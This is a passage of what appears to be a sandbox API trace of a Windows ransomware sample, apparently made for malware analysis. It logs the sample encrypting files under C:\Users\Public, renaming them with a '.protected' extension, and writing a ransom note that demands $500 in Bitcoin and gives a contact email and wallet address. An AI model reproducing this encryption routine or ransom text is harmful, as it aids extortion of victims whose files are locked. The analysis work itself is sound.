lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x7e9, lpOverlapped=0x0) returned 1 [0095.460] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.460] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.460] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.460] CloseHandle (hObject=0xb4) returned 1 [0095.461] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.protected") returned 56 [0095.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.protected" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.protected")) returned 1 [0095.462] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.462] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.462] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.462] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.462] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.462] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.462] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.462] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.462] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.463] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.463] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.463] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.463] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.463] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.463] CloseHandle (hObject=0xb4) returned 1 [0095.463] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.protected") returned 49 [0095.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.protected" (normalized: "c:\\users\\public\\desktop\\desktop.ini.protected")) returned 1 [0095.464] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Windows") returned -1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files") returned -1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files (x86)") returned -1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="$Recycle.bin") returned 1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="System Volume Information") returned -1 [0095.464] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.464] StrStrIW (lpFirst="Google Chrome.lnk", lpSrch=".protected") returned 0x0 [0095.464] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.464] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.464] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.464] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0095.464] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.464] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".rar") returned 0x0 [0095.464] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.465] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".zip") returned 0x0 [0095.465] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x8d1, lpOverlapped=0x0) returned 1 [0095.465] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff72f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.465] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x8d1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x8d1, lpOverlapped=0x0) returned 1 [0095.465] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.465] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.465] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.465] CloseHandle (hObject=0xb4) returned 1 [0095.466] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.protected") returned 55 [0095.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.protected" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.protected")) returned 1 [0095.466] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Windows") returned -1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files") returned -1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files (x86)") returned -1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="$Recycle.bin") returned 1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="System Volume Information") returned -1 [0095.466] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.466] StrStrIW (lpFirst="Mozilla Firefox.lnk", lpSrch=".protected") returned 0x0 [0095.466] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.467] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.467] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".txt") returned 0x0 [0095.467] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.467] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".rar") returned 0x0 [0095.467] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.467] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".zip") returned 0x0 [0095.467] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x485, lpOverlapped=0x0) returned 1 [0095.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.468] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x485, lpOverlapped=0x0) returned 1 [0095.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.468] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.468] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.468] CloseHandle (hObject=0xb4) returned 1 [0095.468] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.protected") returned 57 [0095.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.protected" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.protected")) returned 1 [0095.469] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.469] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.469] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\RESTORE_FILES.txt") returned 45 [0095.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\desktop\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.470] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.470] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.470] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.470] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.470] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.470] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.470] CloseHandle (hObject=0xa4) returned 1 [0095.470] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.470] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.470] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.470] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.471] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.471] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.471] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.471] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.471] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.471] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.471] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.471] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.471] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0095.471] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.471] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0xae, lpOverlapped=0x0) returned 1 [0095.472] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.472] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0xae, lpOverlapped=0x0) returned 1 [0095.472] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.472] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.472] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.472] CloseHandle (hObject=0xa4) returned 1 [0095.473] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini.protected") returned 41 [0095.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.protected" (normalized: "c:\\users\\public\\desktop.ini.protected")) returned 1 [0095.473] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0095.473] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0095.473] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents") returned 29 [0095.473] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0095.473] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0095.474] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\*") returned 31 [0095.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.474] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.474] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.474] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.474] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.474] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.474] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\.") returned 31 [0095.474] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.474] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.474] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.474] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.474] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\." (normalized: "c:\\users\\public\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.475] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.475] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.475] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.475] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.475] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.475] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\..") returned 32 [0095.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.475] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.475] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.475] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.475] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.475] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0095.475] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.475] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 